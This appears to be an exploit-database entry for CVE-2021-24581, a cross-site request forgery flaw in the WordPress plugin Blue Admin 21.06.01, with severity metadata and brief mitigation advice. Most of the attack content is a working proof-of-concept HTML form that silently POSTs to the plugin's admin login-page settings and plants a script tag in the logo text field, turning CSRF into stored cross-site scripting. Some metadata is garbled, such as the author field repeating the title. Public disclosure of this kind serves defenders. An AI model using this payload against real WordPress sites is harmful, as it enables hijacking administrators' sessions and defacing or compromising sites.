header-logo
Suggest Exploit
vendor:
Blue Admin
by:
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Blue Admin
Affected Version From: <= 21.06.01
Affected Version To: <= 21.06.01
Patch Exists: YES
Related CWE: CVE-2021-24581
CPE: a:wordpress:blue_admin:21.06.01
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Professional
2021

WordPress Plugin Blue Admin 21.06.01 – Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery (CSRF) vulnerability exists in WordPress Plugin Blue Admin 21.06.01, which allows an attacker to inject malicious JavaScript code into the login page of the plugin. By sending a specially crafted request, an attacker can inject arbitrary HTML and script code into the application, potentially allowing the execution of malicious code.

Mitigation:

Developers should ensure that all user input is properly validated and sanitized before being used in the application. Additionally, developers should ensure that all user input is properly escaped before being used in the application.
Source

Exploit-DB raw data:

Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581

<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
      <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
      <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
      <input type="hidden" name="ba_lp_attr[logo_img]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
      <input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
      <input type="hidden" name="ba_lp_attr[bg_img]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
      <input type="hidden" name="ba_lp_options_save" value="Save changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR